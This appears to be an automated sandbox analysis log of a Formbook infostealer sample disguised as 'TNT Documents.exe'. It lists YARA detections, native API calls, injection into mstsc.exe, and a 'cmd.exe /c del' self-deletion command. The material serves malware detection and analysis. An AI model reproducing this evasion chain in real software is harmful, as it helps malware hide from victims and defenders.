          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_00075ED2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_0236C2B0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_023699E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06B10BE0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E7CFC8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E71F09
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E71498
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70C38
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E72DE8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E755E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E76198
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E79A35
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E7A7E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E753F8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E793D6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E74F28
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E74F19
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E73CE0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E760E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E748C9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E73CDF
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E748D8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70040
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70006
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70C0D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E75408
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E755D8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E72DAA
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E719A8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E72D81
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E75160
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E76155
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E75150
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E7AD08
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_0007958F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_00074D8E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_00135ED2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_0013958F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_00134D8E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00401030
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00408C8B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00408C90
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00402D87
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00402D90
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00402FB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AA5ED2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155F900
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162E824
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611002
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016228EC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B090
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016220A8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01622B28
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161DBD2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158EBB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016222AE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01621D55
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01622D07
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01550D20
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156D5E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016225DD
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161D466
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156841F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01621FF1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162DFCE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01576E30
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161D616
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01622EF7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AA4D8E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AA958F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05682D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056825DD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567D466
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567D616
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05682EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056828EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056820A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05682B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567DBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056822AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03312FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03312D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03312D87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03318C90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03318C8B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: String function: 0155B150 appears 35 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 055BB150 appears 35 times
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004185EA NtCreateFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00418642 NtReadFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041869A NtReadFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004187CB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015999D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A10 NtQuerySection,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599560 NtWriteFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015995F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159A770 NtOpenThread,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599760 NtOpenProcess,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015996D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03328720 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033287D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033286A0 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033285F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033287CB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03328642 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332869A NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033285EA NtCreateFile,
          Source: TNT Documents.exe, 00000000.00000000.252292198.00000000000EE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.300957032.0000000006DC0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294580237.00000000026F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000005.00000000.280071270.00000000001AE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000000.286422780.0000000000B1E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362999077.0000000003523000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362181801.00000000017DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exeBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TNT Documents.exeReversingLabs: Detection: 46%
          Source: TNT Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TNT Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\TNT Documents.exe "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@10/4
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TNT Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TNT Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: TNT Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: TNT Documents.exe, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_00080576 push ebx; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70ABA pushfd ; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_00140576 push ebx; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0040825A push ecx; retf
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0040C38A pushfd ; ret
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00415CC4 push FFFFFFDFh; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AB0576 push ebx; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0560D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0331C38A pushfd ; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0331825A push ecx; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B832 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B83B push eax; ret
